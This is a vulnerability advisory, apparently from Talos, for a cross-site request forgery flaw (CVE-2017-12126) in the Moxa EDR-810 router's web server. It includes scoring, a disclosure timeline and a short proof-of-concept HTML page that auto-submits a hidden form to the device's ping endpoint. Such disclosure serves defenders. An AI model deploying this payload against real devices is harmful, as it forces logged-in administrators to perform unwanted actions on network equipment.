Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability(CVE-2017-12126)

Summary

An exploitable cross-site request forgery vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP packet can cause cross-site request forgery. An attacker can create malicious HTML to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Details

In order to trigger the CSRF a logged in user needs to visit a page with malicious code on it. The malicious code will be able to do anything the logged in user can do. For example the malicious code could add a user, modify firewall rules, etc. This could also be chained with a command injection to get a root shell on the device. This problem is compounded by the fact that users cannot log out of the device, meaning that a user’s session will remain valid long after they’ve stopped interacting with the device.

Exploit Proof-of-Concept

<html>
  <body>
    <form action="http://192.168.127.254/goform/net_WebPingGetValue" method="POST">
      <input type="hidden" name="pingTmp" value="192.168.127.22" />
      <input type="hidden" name="ifs" value="1" />
      <input type="hidden" name="ip" value="192.168.127.22" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Timeline

• 2017-11-15 - Vendor Disclosure
• 2017-11-19 - Vendor Acknowledged
• 2017-12-25 - Vendor provided timeline for fix (Feb 2018)
• 2018-01-04 - Timeline pushed to mid-March per vendor
• 2018-03-24 - Talos follow up with vendor for release timeline
• 2018-03-26 - Timeline pushed to 4/13/18 per vendor
• 2018-04-12 - Vendor patched & published new firmware on website
• 2018-04-13 - Public Release